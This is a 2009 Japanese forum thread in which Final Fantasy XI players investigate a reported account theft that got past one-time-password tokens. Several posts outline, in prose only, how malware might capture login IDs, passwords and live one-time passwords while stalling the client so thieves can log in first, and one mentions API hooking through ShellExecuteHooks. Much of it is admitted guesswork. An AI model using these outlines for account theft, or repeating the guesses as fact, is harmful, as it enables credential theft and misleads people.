が勝手にどこかに送信されるプラグイン入ってるんじゃなかったっけ?(FFAHはこれで成り立ってると聞いた)

それができるなら、プラグインで容易にID-Pass送信なんかできちゃうわな・・・ クライアント自体を故意に強制終了させる
事だってできそうだな・・・今回の件は
589既にその名前は使われています:2009/08/19(水) 03:07:02 ID:mDUQPw1H
>>572 の方法だと、2で本人がワンタイムパス入力してるだろうから
盗人が使おうとしても既に無効になってない?
590既にその名前は使われています:2009/08/19(水) 03:09:13 ID:mDUQPw1H
ミスった。>>579だった。
591既にその名前は使われています:2009/08/19(水) 03:17:30 ID:yJrPl7ou
そういえば最近、sayやtellで無意味な記号の羅列を流してるキャラ
度々見かけるんだけど関係してるかな?
やっぱりツールに何か仕掛けられてるとか

ちなみにGMコールしてみたんだけど「本人以外は(ry」のテンプレ返答だった
592既にその名前は使われています:2009/08/19(水) 03:20:50 ID:Pa4C84o3
>>589>>590
>>579は、2.の段階でスクエニへの送信を阻止しつつ、悪者のサーバに送ってしまうケースを想定したもの。
スクエニのサーバにデータが届かず、認証に使われてなければワンタイムパスは数分間の寿命があるようだから。

もっとも、そういう動作をマルウェアの存在が確認されたというわけではなく、報告された状況から原理的には
こういうこともできるなあと妄想を膨らませただけなんだけどね。
593既にその名前は使われています:2009/08/19(水) 03:21:08 ID:toq4SDZ3
Windowerは半角カナにすぐなるから使いづらかった
594既にその名前は使われています:2009/08/19(水) 03:25:24 ID:ew7wUP77
polに穴あるんかなぁ
595既にその名前は使われています:2009/08/19(水) 04:41:13 ID:cRAYH6O1
>>584
それをいつまでも錦の御旗にされてもなぁ
596既にその名前は使われています:2009/08/19(水) 04:42:20 ID:4lBRNwae
現時点じゃネタにしか見えんわな
他の同ケース待ちだ
597既にその名前は使われています:2009/08/19(水) 04:53:06 ID:r7TipUZW
■eはいつになったら「ぶろがめ。こm:ぶろさぇ。こm」の調査がおわって対策すんの?
598既にその名前は使われています:2009/08/19(水) 05:22:37 ID:6QrMnzs2
一応使ったことがないとわからん情報だと思うので書いておく。
Windowerは、POLからFFへの起動時(キャラ選択画面)に、■eじゃないところと通信してる。
IPアドレス 64●119●128●154
ホスト名 vanachat●com
危険サイトかどうかは、俺は知らんが、とりあえずノートンで遮断はしてる。
599既にその名前は使われています:2009/08/19(水) 05:33:42 ID:9GPkS19T
>>598
ツーラーが開き直ってどうすんだあほw

そこはお前が使ってるツールのサイトだろ、jk
600既にその名前は使われています:2009/08/19(水) 05:34:59 ID:r7TipUZW
ネタじゃなきゃまずサポセンに相談するわな。
601既にその名前は使われています:2009/08/19(水) 05:56:56 ID:4lBRNwae
ここまでしつこいとギルDUPEのカモフラージュに見えるなw
602既にその名前は使われています:2009/08/19(水) 07:08:20 ID:Wp+wyD9I
    ∧_∧  / ̄ ̄ ̄ ̄
  ∧( ´∀`)< あげ
 ( ⊂    ⊃ \____
 ( つ ノ ノ
 |(__)_)
 (__)_)
603既にその名前は使われています:2009/08/19(水) 08:05:15 ID:bIoSioU9
>>592
ワンタイムパスは一度認証したら、そのパスは使えない
604既にその名前は使われています:2009/08/19(水) 08:26:49 ID:YbycP4k+
だから、認証されずにハックしたヤツのところにいったとしての話。
605既にその名前は使われています:2009/08/19(水) 09:11:52 ID:Qpov7uru
入力されたID、パス、ワンタイムパスを横取りするマルウェアは十分考えられる。
一時猛威を振るったパス抜きも、POLビューアーに潜んで
IDとパスを送信時に横流しするタイプじゃなかったっけ。
このタイプで来られるとワンタイムパスは無力だよな。

ただワンタイムパスの有効期限が数分間なことから、
業者がPCの近くに常に待機している必要はある。効率的とは言い難い。
606既にその名前は使われています:2009/08/19(水) 09:15:25 ID:G8I0WssL
数分間の猶与はあるっつっても、一度でも認証鯖で使ったらその瞬間に無効になるからな
ログイン中に落とされた場合はワンタイムパスを抜かれてどうのってレベルの話じゃ
なくなってくるわけ。
>>605
まったく関係のないフィッシングサイトでワンタイムパスを抜いてPOLでマッハで入力して
アカウントを奪う手口は今普通に流行ってる。公式で注意喚起してるのがそれだべ。
上のツーラーの場合はログイン中に落とされたって話だからおかしいの
607既にその名前は使われています:2009/08/19(水) 09:18:06 ID:4Ebsqhip
ワンタイムパスは機械に表示されてから50秒位たってから入力すればいいってこと?
608既にその名前は使われています:2009/08/19(水) 09:19:24 ID:o8Jrlmct
ニコニコ動画でツールつかった動画うpしてるのあるけど
もしかしてWindower使った動画?
609既にその名前は使われています:2009/08/19(水) 09:21:41 ID:G8I0WssL
>>607
それは

・POLビューワがウイルスに冒されていて、パスの送信先を違うところにされている
・ワンタイムパスの表示されてからの猶与時間をはっきり把握している

場合じゃないと有効ではないと思う。
で、現時点で上の二つは両方ともはっきりしてないから特に意味無し
610既にその名前は使われています:2009/08/19(水) 09:31:26 ID:G8I0WssL
あと一応複垢と複数の端末持ってる有志に試して欲しいんだが
A端末B端末、C垢D垢あるとして、

・ワンタイムパスαを発行してAでCログイン
 ↓
 Cのログイン中にBでもαを使いDのログイン試行

・ワンタイムパスβを発行してAでCログイン
 ↓
 Cのログイン中にBでもβを使いCのログイン試行

ここらへんを試して、「ワンタイムパスが絶対に二度と使えない」ってのを確かめてほしい
ただ三回だっけ?失敗すると一時凍結食らうからそれだけ注意で
611既にその名前は使われています:2009/08/19(水) 09:37:34 ID:RPKgI2cY
トークンあるからって油断して、
FF入れてるPCで競売サイト見てたり、IE使ってたり、
Flash更新してなかったり、外部ツール使ってたりするなってこったろうな。
612既にその名前は使われています:2009/08/19(水) 09:59:13 ID:dJlCW/D0
genoウイルスどうなりますた?
613568:2009/08/19(水) 10:18:53 ID:Cmudd3rL
>>576
貼ってくれてるサイトに行ったらフリーズしたので昨日はやめました。
また調べておきます。

>>583
「エラーメッセージなしで落ちる」
突然FFの窓が消えます。落ちる前後に何もエラー表示がありませんでした。

アカ買いじゃないですし、業者でもないです。
サポセンには連絡していません。
614既にその名前は使われています:2009/08/19(水) 10:47:35 ID:zxbLSKPu
>568 さんありがとう。やっぱりこういうことか・・・

・ウィルス感染
   ↓
・FFに普通にログイン(1回目のPassは■e認証鯖に送信される)
   ↓
・ログイン後20分ほどでウィルスのせいでPOL.exe強制終了
   ↓
・POL-ID Pass ワンタイムPass 2回目入力
   ↓  *■e認証鯖に送られずに業者に送信
・ID-Pass認証中になる前にウィルスがPOL.exeを抑制
   ↓  *業者、ハックしたパスでログイン(2回目のPassは■e未認証のためワンタイムPass数分有効)
・何度入力しても認証前にPOL.exeフリーズ繰り返す
   ↓  *POL.exeがフリーズしている20分間にギル・アイテム奪取
・最初の強制終了から20分後ぐらいにログイン可能に
   ↓
・ギル・アイテムロストでハック判明

ネタと笑う奴がいるが、仕組みとしてはハック可能だね・・・釣り釣り言ってる奴のほうが業者に見えるわ・・・
Flashの最新Verは10.0.32.18 以下で確認を ttp://www.adobe.com/jp/products/flash/about/
615既にその名前は使われています:2009/08/19(水) 10:52:50 ID:24mB7Co0
事実ならワンタイムもう突破されたって事ですか
まいったねこりゃ
616既にその名前は使われています:2009/08/19(水) 10:53:35 ID:Af4/YMoN
>>568
こんな感じなのかな?

・起動している非表示状態に変更(落ちてないから2重起動出来ない)
・再ログインをうながす偽のインターフェースを表示
・ID&PW、そして未認証の生きたワンパスを取得
・偽インターフェースは認証中のふりをして時間を稼ぐ
・ハッキング者はその隙にログイン

質問なのだが再ログインする時のウィンドウに違和感なかった?
ツールバーから閉じるって作業をしてた時点でかなり怪しいけどね
617既にその名前は使われています:2009/08/19(水) 10:59:36 ID:zxbLSKPu
 C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annots.api
 C:\WINDOWS\system32\Macromed\Shockwave 10\SwOnce.dll
 C:\WINDOWS\system32\Macromed\Flash\Flash10b.ocx


いまの最新Verだと Flash10【c】.ocx
あと、アドビリーダーがいまだにVer7ってのもマズイ気がするが(最新版はReader 9.1.3(フォルダはReader 9.0))
・・・VerUPでやるとフォルダ構成変わらないんだっけ?
618既にその名前は使われています:2009/08/19(水) 11:03:26 ID:Af4/YMoN
かぶったorz
ID&PWは本当にPOLのプロセスをハックしてるのかな?
再認証作業してた課程で再起動を挟んていたかと
現時点で再発してるのか確認したいところだね
619既にその名前は使われています:2009/08/19(水) 11:04:32 ID:G8I0WssL
一回目は普通にログインさせて、一度落とさせて二度目のログイン試行のときに
パスを盗んだあげくに所持者はログインさせないようにする、っていう仕組みを
POLビューワに仕込んだ っていう仮説か
じゃとりあえずpol.exeのサイズとハッシュの確認かなー
俺のが
1,601,536 バイト
564d8a1a3d91d373b5d9e6271fb9a0aa
620既にその名前は使われています:2009/08/19(水) 11:09:14 ID:mQH+fjzM
なんでツーラーにレスつけてるわけ?
ツーラーはハクられようがBANされようが自業自得だろ。
ツーラーぷぎゃーwwww以外にいちいち相手になってやってんじゃねーよ。
621既にその名前は使われています:2009/08/19(水) 11:10:48 ID:zxbLSKPu
Windower自体がPOLをハックしてるから、可能性はあるんじゃないでしょうか?

2垢目がWindower未使用で1垢目ハック活動中にログインできたという所からも、
原因はWindower(およびプラグイン)にあると思われますが・・・
Windowerではない別プロセスとしてウィルスが活動していたのであれば、2垢目の
ログインのためのPOL.exeも抑制されてしかるべきだと思うからです。

まあ、1垢目凍結後に2垢目もWindower利用でログインしたのであれば、その後の2垢目の
同様の動きによるハックは頷けます。
622既にその名前は使われています:2009/08/19(水) 11:12:14 ID:Af4/YMoN
横取りは比較的楽だけど仕込みは難しくないかな?他に影響出るし
フィッシングサイトのことを考えると似たようなものを作っている可能性はあるよね
623既にその名前は使われています:2009/08/19(水) 11:13:13 ID:kNvRYCU5
>>605
業者ってのは普通のRMT企業も含めて24時間体制に近いと思う
出会い系サクラと一緒で常に誰かがPCに張り付いてるだろうから
偽サイトにデータを送られると5分以内には乗っ取られてるかと

以前テレビでやってたRMT業者の実態ってのがあったが
オフィスの見た目は一般の会社並にクリーンにみえるぞw
ちなみに上に書いた出会い系業者のオフィスも見た目はキレイw
624既にその名前は使われています:2009/08/19(水) 11:20:48 ID:Af4/YMoN
Windower経由の時だけかどうかも気になるね
>>621にあるように2垢目のハックがWindower使用時に発生したなら
Windower経由で起動した場合にのみハッキング動作が入る可能性はある
625568:2009/08/19(水) 11:27:11 ID:Cmudd3rL
>>616
ウィンドウに違和感はまったく感じなかったです。
ただ今までにない症状(突然窓が消える、認証画面から進まなくなる)だったので、
ハックを疑いました。
626既にその名前は使われています:2009/08/19(水) 11:30:29 ID:G8I0WssL
>>625
pol.exeのサイズ見てみて
あとどっかでmd5が調べられるソフト落としてそれにpol.exe通してみて
627既にその名前は使われています:2009/08/19(水) 11:35:47 ID:b1431/di
>>624
Windowerの危険性はえらい昔から言われてるけど、そこを狙ってきた、ってことなのかな
…事実なら開発者の目の付け所はすごいな……
628既にその名前は使われています:2009/08/19(水) 11:37:21 ID:r7TipUZW
そういえばかつてのPOLVU後パスワードを認識しない不具合が出たときはちょっと焦ったな。
629既にその名前は使われています:2009/08/19(水) 11:39:11 ID:kNvRYCU5
>>627
開発者っつかWindowerの開発者とも関係あるんじゃね?

元々グレーなツールではあるしツールを利用して
RMT業者と組んで荒稼ぎ考えてもおかしくはないかと
630既にその名前は使われています:2009/08/19(水) 11:40:19 ID:9wTOhgYl
ツーラーざまあwwwwwww
631既にその名前は使われています:2009/08/19(水) 11:45:35 ID:EeSff70g
FFのパス類を入力するPCと、板やらサイトやら見る場合のPCは別にするのが
一番安全な方法だってことは、前々から言われてたことだしね...。
ツーラーは【知らないんです】。
それでも、個人的には完全に安全ではないと思うくらい。

後、社員からの特定上等!で書くが、
業者の無差別tellに関しては、数日前に要望メールフォームから
暫定的だけど、低コストで比較的短期間にできるプログラミングを提案してみた。
これは友人からのアドバイスなんだが、内容は、かなり後ろ向きなプログラムなのは否めない。

業者もここ見てるみたいだし、提案の内容は今明かせないが、
もしこれが採用されれば、しばらくはtellなしで快適に過ごせると思われる。
この案が採用されるか、運営側視点から見ると、ちょっと難しいところだが、
ワンタイム突破されたかもで、今それどころじゃなさそうだし、
今月いっぱいまでは待ってやろうや。
FFやってるシステムプログラマーさんたちなら、何となく察しはつくんじゃなかろうか。

とりあえず、採用しようがしまいが、八月いっぱいまでに、このことについて何にもなければ、課金停止してちょっと旅にでも行ってくる。
632既にその名前は使われています:2009/08/19(水) 11:46:05 ID:zxbLSKPu
とりあえずは >568 さんの再報告待ちになりますね。

ツーラー乙、プギャーで済ませたいというのは正直ありますが、現状では原因ははっきり判っていないのです。
現時点ではWindowerおよびそのプラグインが原因であるという線が濃厚だと思われます。今回は、ツール使
用を告白してくれているので、まだある意味他人事として傍観できますが、仕組み的にはweb経由でのウィルス
でのハックでも今後同様の手段がとられるであろう事は目に見えてます。

今回の報告例は、「FF強制終了時・回線切断時には注意すべし」という新しい認識ができたのである意味感謝です。

ツールは使わない・MSUpdate・Flash・Quicktime・pdfリーダー・使用ブラウザのVerUPは常に気をつける・・・
web専用に2台目のネットブックとか利用すればいいんだろうけど、嫁と小遣いが許してくれません・・・(つД`)
633既にその名前は使われています:2009/08/19(水) 11:46:13 ID:/iRlHax/
FFAHの件で別スレ立ってるし、久々にデカい騒ぎになりそうなのか。
634既にその名前は使われています:2009/08/19(水) 11:50:00 ID:ew7wUP77
無理矢理にでもWindowerを悪者にしたいって事は分かった
635既にその名前は使われています:2009/08/19(水) 11:51:33 ID:ew7wUP77
こんな池沼じみた発言出来る奴のこと信じる奴いるのか?

216 205 [] 2009/08/19(水) 10:01:51 ID:zxbLSKPu

うちは、グレイは使ってないんだが、secuniaPSIを利用しているため

>176
>「禁断の壺」「secuniaPSI」「GrayUtilities」の3つのソフトが感染してた

我が家もSP3 Firefox3.5.2+NoScript+AdblockPlus+RequestPolicy PeerGuardian利用中と、>176と
非常に環境が似通っているためこの件に関しては、動向が気になっています。

しかし、利用中の「secuniaPSI 1.5.0.0」は、exe自体と、保存してあるセットアップexeをVirustotalに投げてみたが
異常は発見されなかったため、>176 は少なくとも「GrayUtilities」→「secuniaPSI」への感染が発生していると
思われます。(窓の杜から落とした「GrayUtilitiesインストーラー」はVirustotalで反応した)

FFのために、利用PCの環境をガッチガチにして利便性を失っている部分があるのに我慢して使ってるところも
あるので、こういう情報は非常に【興味があります】【ありがとう】
636既にその名前は使われています:2009/08/19(水) 11:54:10 ID:EFyPLNeB
>>556
アカウントとハンドルは別物
637既にその名前は使われています:2009/08/19(水) 11:58:18 ID:GepmGuQ/
Firefox+NoScript+AdBlock+PG2で感染したって奴いるけどあり得るの?
俺それでFFXIAH使ってて何ともないんだけど
638既にその名前は使われています:2009/08/19(水) 12:04:12 ID:r7TipUZW
とりあえずFFXIAHは使わない
639既にその名前は使われています:2009/08/19(水) 12:12:17 ID:zxbLSKPu
>637
その環境でAH使っているので、過去の競売履歴という一番の目的の部分が見れてない(最高値・平均しかみれないw)
のですが、私も基本的には何ともないですね。
ただ、直近のNoScriptのバージョンで、ABE有効でIframeを素通りという問題があったというのも事実で(今は直っている)
同様の環境の方がウィルス感染とか見ると、また不具合でもあったのか!?と、ついつい反応してしまいます。
640568:2009/08/19(水) 12:41:59 ID:Cmudd3rL
2アカ目の起動はすべてwindowerを使わずにしています。
最初にハックされたときに、エラーが出ずに窓が消えていたのが
windowerでの起動によるものなのかと疑ったので。
ツールを使っているからハックされたと思えたのならここに書かなかったけど、
そうじゃないように感じ、同じようなハック事例もなかったので書いてます。

>>626
今は確認できないので、夜にできたら返答します。
641既にその名前は使われています:2009/08/19(水) 12:56:04 ID:Af4/YMoN
>>568さん
もし再現したらProcessExplorerみたいなもので正規の場所のPOLが起動しているかどうか
また、何か怪しいプロセスが起動しているかどうかも確認してみて
POL本体は問題なくても偽ツールが動いてる可能性もあるから
642既にその名前は使われています:2009/08/19(水) 12:56:44 ID:p/2QyyYe
>>617
Annots.apiはAdobeReader9.1→9.1.1か9.1.2で更新。
643既にその名前は使われています:2009/08/19(水) 14:00:32 ID:c6b1UDsR
FF11がトークんで安全でもクレカとかそっちの方は安全ではない恐れが在ることを忘れずに。
644既にその名前は使われています:2009/08/19(水) 14:32:06 ID:XJ+5HxyO
クレカ番号盗まれようがツール使ったのが悪いってのwwwwざまあwwwww
プギャプギャ━━━m9(^Д^≡^Д^)9m━━━━!!!!!!!!
645既にその名前は使われています:2009/08/19(水) 14:56:01 ID:tMOzU1Aq
つまり一回目の起動時はPOLIDとパスとトークンパスを送らせ(従来型)
二回目以降はPOL自体起動させないようにする(ここから新手法)
って訳か?補足すると二回目の措置は時限式に解除されて最初に戻るみたいな。
646既にその名前は使われています:2009/08/19(水) 15:10:03 ID:e8Pf+GIF
windowerを使ってるNAは結構いるんじゃなかったっけ。
あいつら一気にプギャーできるならちょっと愉快だけれど、ワンタイムパスでもスーパーハカーは防げないとなると複雑だな、、。
今のウィルスはwindowerを使ってpolと認証サーバーとのやりとりをハックしてる訳だけど、そのうちwindowerを経由しないでもハクれるタイプのが出るかもしれん。
647既にその名前は使われています:2009/08/19(水) 15:10:32 ID:jFHOEPVM
648既にその名前は使われています:2009/08/19(水) 15:12:47 ID:6R/i1Rk4
>>646
windowerを経由しているか確認された訳ではないし
2アカ目はwindower使ってないのにクラックされたと言っている
649既にその名前は使われています:2009/08/19(水) 15:36:47 ID:/BOkVINV
2垢目のハックされた状況がwindowerを使ってないにもかかわらず使っていた1垢目と同じってことは、
windowerの有無じゃ無くPOLの方に問題があったんじゃない?
2垢目もトークンありでハックされたとなると、
2垢目のPOLからログイン操作でワンタイムパスを盗んで、そのPOLでログイン認証させずに
他の端末から不正ログインしないと無理な訳で。
ワンタイムパス自体が盗まれたんじゃなく解析されたんなら、FF11だけじゃなく金融機関もオワタwだし。
650既にその名前は使われています:2009/08/19(水) 15:44:12 ID:e8Pf+GIF
おお、読み落としてた。
と、いうことは、>>568のPOL.exeがすでに書きかえられてる可能性が高いって事か。
どこから来たウィルスなんだろうな〜。
651既にその名前は使われています:2009/08/19(水) 15:46:26 ID:Af4/YMoN
解析では無くフィッシングと同じ理論だね
釣り針に食いついてしまうとワンタイムパスワードも効果無いよ

>>645
時限式の可能性もあるけど受け側がキャパ超えしてる可能性もあるね
652既にその名前は使われています:2009/08/19(水) 15:51:53 ID:4lBRNwae
ワンタイムパス解析考え難いな
653既にその名前は使われています:2009/08/19(水) 16:12:41 ID:dOL3hnhp
最近のウィルスはexe 改変せずに、ShellExecuteHooksとかに自分(DLL)を登録し
自動起動して標準APIをフックしてルートキットになって、さらに特定のAPIに渡される文字列を
横取りして大陸鯖に送信したり、いろいろしてくる。
654既にその名前は使われています:2009/08/19(水) 17:14:11 ID:EZzpAj48
俺も>>614の線が濃厚だと思うな。
一昔前に流行ったPOLでのログインプロセスを乗っ取る方法を発展させる
(一定時間だけPOLからの通信を遮断もしくはPOL暴走)だけでいけそうだし。
ID,パス,ワンタイム抜いてから、20分の時間稼ぎさえできりゃ充分なんだろな。
ワンタイムパスあるから、■eパス変更まではしないんだろうね。
655既にその名前は使われています:2009/08/19(水) 17:28:35 ID:wju1O3+l
今週からバイトに行き始めた会社
ヤフーとかに出店してて、ネット販売もやってるんだけど
メールのやりとりしてるPCのウィルス対策が、バスター
しかも10日以上更新してないw
“更新してくださいってpopが出てますけど?”って聞いても
“ほっておいて良いよ”って社員が答える

こんなトコからウィルスがばらまかれるのね・・・
656既にその名前は使われています:2009/08/19(水) 17:53:54 ID:M1mgEKS1
公式の報告メールフォーム、開けないんだが、なにかやっているんかね?
657既にその名前は使われています:2009/08/19(水) 18:01:50 ID:EZzpAj48
ワンタイムパス抜かれたら、トークン解除設定もできちゃうじゃん・・・
これは北京五輪直前にあった垢ハック祭り再来の兆しかのぅ・・・
658既にその名前は使われています:2009/08/19(水) 18:04:11 ID:G8I0WssL
>>657
ワンタイムパス自体が抜かれても、一回しか使えない。
もしワンタイムパスの仕組みが全部解析されてしまったというのなら
責任問題でもっと大騒ぎになる。
で、解除のときにもWEBでOTPいるからそこまでの手間はしてないっぽい。
とにかく一回ログイン奪って金品奪う感じだね
659既にその名前は使われています:2009/08/19(水) 18:08:25 ID:0rJl6K3D
>>658
抜き方にも寄ると思うよ、フィッシングサイトやPoL偽装ソフトだと
その一回でトークン解除からパス変更までやられる恐れがある。
660既にその名前は使われています:2009/08/19(水) 18:17:12 ID:jyne3tFy
トークンを解除する時に求められるワンタイムパスは、
POLログインの時とはまた違う番号の組み合わせじゃないのかな?
だから1回ワンタイムパスを抜いてログインしただけじゃ、
解除まではできないという意味では。
ログイン時と設定変更時と2回連続で正しいワンタイムパスを入れられなければ、
設定は変えられないよね?
ち、ちがう?(゚Д゚≡゚Д゚)
661既にその名前は使われています:2009/08/19(水) 18:18:42 ID:0j2OBsDq
1.FFAHを見る。windowerのデフォルトプラグインが書き換えられる。
2. windowerでPOLを起動すると、リアルタイムで中華にID、PASS、ONE-TIMEPASSが送られ、
何故かPOLが起動できない。
3.再度POLの起動を試みるも、置き換えられたプラグインによりPOL起動をブロックされる。
4.POLの起動をブロックされてる間に、中華は受信したID、PASS、ONE-TIMEPASSでログインをし、
財産を別キャラに転送し、終了

って感じかな。特に、4のログインは手動でやると間に合わないケースも出てくるだろうから、
専用ツール作って自動化してる可能性も十分にあるよな。奴らは金のためなら、あらゆる手法、手段使ってくるしね。

それと、windowerを使ってた時あるけど、あれ怪しい動作するよなw
特にSPAMフィルターのプラグインの動作を見てると、
FFを起動する度に、勝手にフィルター設定のデータをダウンロードしてくる。
プラグイン外すことも出来るんだけど、面倒でそのまま使ってたわ
662既にその名前は使われています:2009/08/19(水) 18:19:42 ID:jyne3tFy
あ、POLじゃなくてスクエニなんとかサイトのミスねw(/ω\)
663既にその名前は使われています:2009/08/19(水) 19:44:39 ID:/BOkVINV
POLでもPOLパスワード変えるにはワンタイムで一回ログインして、
会員情報を変更する時もワンタイムパスを求められたから2回以上ワンタイムパスが必要だった。
664既にその名前は使われています:2009/08/19(水) 19:58:42 ID:vk3Oui2J
ツール使っといてハックされましたとか馬鹿じゃないの?
みんなが使ってるから安全なんて思ってんのか?
正直、解らんやつは何か送信されてても気がつかないだろ
で、スクエニにどう泣きつくんだ?ツール使ってましたって言うのか?w

『アドバンテージ』なんて都合のいい部分だけ一人歩きしたのを真に受けて
使ってもいいんだと本気で思ってたんだろうな
まさに自業自得、卒業おめでとうございます^^
665既にその名前は使われています:2009/08/19(水) 20:01:48 ID:4lBRNwae
FFAHがやばいので使わない
windowerもやばいので使わない

当面保身したけりゃこの二つでいいな
666既にその名前は使われています:2009/08/19(水) 20:06:55 ID:FaeM1c5N
『フィッシング・クライアント』

【手口】
1)感染潜伏して Pol.exe を落とす。
2)ユーザが再度ログインを試みる → ログインできず。
 ログイン・ダイアログ(偽者? または 正規+盗聴ウィルス)に入力すると、
裏でウィルスは ”ログイン情報”{ID, ■eパス, ワンパス}を悪者サーバに送信。
3)ユーザがログインできずに居る間に、悪者が”ログイン情報”でログイン。 悪者が垢から金品を奪う。
4)ユーザがやっとログインできるようになる(2)から数分〜数十分後)。
5)ユーザがログインすると、身ぐるみ剥がれてる。

【参考レス】 >>614 >>616 >>619 >>661
【教訓レス】 >>632
【今回の教訓】
・サードパーティソフト(AdobeReader, AdobeFlash, など)も最新状態を維持すべし。
・ツールはヤバイ。ダメ。ゼッタイ。
・Pol.exe 落っこちたら、慌てて再ログインしてはいけない!(感染してる可能性有り)

「ツーラー乙」って対岸の火事では居られない感じ。
今回はツーラー絡みだったけど、この手口、潜伏常駐型ウィルスでも可能と思われ >>632 によれば pol.exe を改ざんしなくても可能みたい。
667既にその名前は使われています:2009/08/19(水) 20:12:06 ID:/BOkVINV
windowerも十分あやしいが、使ってない垢でも同じ症状でハックされたんだから、新種のハック方法かも知れんのに
ツーラー乙ですまされないんだよ。ツールに依存してハックされたんじゃなかったら全プレイヤーの脅威なんだぞ。
あとこのスレもそうだしネ実全体でもage進行だから。
668既にその名前は使われています:2009/08/19(水) 20:12:10 ID:dwH/IhRQ
windowerが犯人確定になってるこのスレ








見逃せないねwwwwwwwwwwwwwwww
669既にその名前は使われています:2009/08/19(水) 20:13:19 ID:FaeM1c5N
『ツーラー乙と対岸の火事で居られない理由』
>>653 でした(アンカーミス、スマソ)。
pol.exe を改造しなくても、常駐潜伏するウィルスで、ID, パス, ワンパス セットで抜かれちゃうから。
更に、pol.exe の正常起動を数分間、邪魔して、その間に、垢から金品を奪っちゃう。
670既にその名前は使われています:2009/08/19(水) 20:14:15 ID:G8I0WssL
推測だけ先走りすぎてる感があるねー
サポセンに連絡入れてないっていうから、ハックってことすら確定は出せないからなぁ。
とりあえずPOLビューワがいじられてないかだけ教えて欲しいな
671既にその名前は使われています:2009/08/19(水) 20:19:47 ID:FaeM1c5N
>>670
普通に、POL の ファイルチェック じゃダメなんかな?
POLが感染してる可能性あるから、信用できない?
サーバと交信してファイルチェックしてるから、信用できる?
確実なのは MD5 とってみることだろうけど。

これとか使えそう。
ttp://www.forest.impress.co.jp/article/2005/12/15/cccs.html
672既にその名前は使われています:2009/08/19(水) 20:27:22 ID:FaeM1c5N
無差別 Tell 広告爆撃で、ツール使わせるように仕向けて、
そのツールで ID, ■eパス, ワンパス 奪った上に、
しばらくの間 Pol.exe でログインできなくしちゃう。
ログインできない間に、金品強奪。

やり方が巧妙になってきてるな・・・
673既にその名前は使われています:2009/08/19(水) 20:49:13 ID:5Z/fSDRx
関連スレ張っておく

FFXIAHにスパイウェア!
ttp://dubai.2ch.net/test/read.cgi/ogame/1250468452/l50
674568:2009/08/19(水) 22:05:08 ID:wDPaa7OY
>>576>>610
遅くなりましたが、Flashのバージョンは10.0.22.87でした。
今はなぜかFlashPlayerのサイトにアクセスできないので、最新版にできませんでした。

今気付いたのですが、カスペルスキーで
2009/08/18 21:10:03 検知しました 悪意が存在するプログラム
C:\PROGRAMFILES\PLAYONLINE\SQUAREENIX\PLAYONLINEVIEWER\POL.EXE
ViruslistJP.comで検索したらKeyloggerだそうです
675既にその名前は使われています:2009/08/19(水) 22:09:56 ID:G8I0WssL
>>674
カスペは、初期設定だと何かしらの文字を入力してネットに送信するソフトは
たいていキーロガーと判断するから、それだけだとまだ確定診断じゃないよ。
ファイルサイズとMD5よろしく
676既にその名前は使われています:2009/08/19(水) 22:10:48 ID:dwH/IhRQ
ハッシュだせないんすか?
677既にその名前は使われています:2009/08/19(水) 22:12:54 ID:FaeM1c5N
>>674
カスペ2009が POL.exe をキーロガーとして検出するのは仕様。
「設定ダイアログ」−「オプション」−「脅威と除外」で、除外ルールに登録すればいい。
あー、【完全な安全性が確保】された、された後(クリリン、再インスコ)でね。
678既にその名前は使われています:2009/08/19(水) 22:18:55 ID:4Ebsqhip
Windows で Flash Player のインストールができない
ttp://www.adobe.com/jp/support/kb/ts/228/ts_228685_ja-jp.html

手順5のinternetexplorer版のリンクから単体最新版が落とせる 10.0.32.18

通常の更新ページから更新できない人はこっちでやってみろ
679568:2009/08/19(水) 22:41:32 ID:wDPaa7OY
>>678
ありがとうございます。
adobe.comに接続できないので放置状態です。

>>675>>677
カスペルスキーについて、ありがとうございます。

MD5ですが、DLしたものの意味がわかりません、ゴメンナサイ。
680既にその名前は使われています:2009/08/19(水) 22:45:29 ID:kCF1PU1i
>>637
noscriptはご存知のように火狐の上でのみ有効なアドオンだ。
窓の杜なんかで配ってるフリーウェアにウイルスが含まれてる場合は
セキュリティソフトが見つけてくれなかった場合乙る。
681既にその名前は使われています:2009/08/19(水) 22:53:02 ID:4Ebsqhip
じゃあこっち

Adobe Flash Player ActiveX 10.0.32.18
ttp://www.updatestar.com/ja/detail/adobe-flash-player-activex
682既にその名前は使われています:2009/08/19(水) 23:04:48 ID:FaeM1c5N
Adobe Flash Player (バージョン数) ActiveX
Adobe Flash Player (バージョン数) Plugin
上の2つを、「プログラムの追加と削除」でアンインストールして、
IE, Firefox(Google Chrome, Opera, Safari) それぞれで、インストールするって、手もあるよ。
683既にその名前は使われています:2009/08/19(水) 23:06:20 ID:FaeM1c5N
>>610 ワンタイムパスワードが本当に一度しか使えないか検証してみた
【結論】
本当に一度しか使えない。検証方法は次レスにて。
先にログオンしていた端末「先」(左)には、次のメッセージが表示される。
 現在ログイン中のプレイオンラインIDで
 他の端末からもログインされたため
 オフラインに切り替わりました

後からログインした端末「後」(右)には、次のメッセージが表示される。
 スクウェア・エニックス アカウント認証エラー
 エラーコード:POL-5311
 スクウェア・エニックスID
 またはスクウェア・エニックスパスワード、
 もしくはワンタイムパスワードが間違っています。

【証拠画面】ttp://www1.uploda.tv/v/uptv0040635.png
684既にその名前は使われています:2009/08/19(水) 23:08:05 ID:FaeM1c5N
ワンタイムパスワードが本当に一度しか使えないか検証してみた
【用意したもの】
1)トークン登録済み■e垢(x1)−POL垢(x1)、 2)PS2x2台(一台はPS3)、 3)PCx2台

【検証方法】
1)端末「前」(PS3)、端末「後」(PS2)のログイン画面それぞれに、素早く、同じ■eパス、同じワンパスを入力。
両方とも「接続する」にカーソルを合わせておく。
2)「前」でログイン実行。
3)「前」がログインした直後、「後」でログイン実行。
4)「前」は接続が切れる。「後」は認証エラーメッセージが表示されてログインできず。

【他の組み合わせ】
(「前」=PS2, 「後」=PC)、(「前」=PC, 「後」=PS2)
(「前」=PC, 「後」=PC)の計4通りで試したが、結果は同じ。

ちなみに、ログイン直後に別端末からログインされると、画面が面白いことになる。
直後(1秒くらい?)でなければ、普通に表示された。
ttp://www1.uploda.tv/v/uptv0040640.png

1つの■e垢に2つのPOL垢を結び付けてないので >>610 の検証はできんかった。環境ある人、後を頼む。
685既にその名前は使われています:2009/08/19(水) 23:14:22 ID:mDUQPw1H
2アカでやるとき
1台目普通にログイン
2台目あれ?さっきと同じパス表示じゃね?案の定エラー
1度あった
686既にその名前は使われています:2009/08/19(水) 23:17:38 ID:8LyZC19f
adobe.comって韓国のサーバー使ってるの?
61●111●58●91
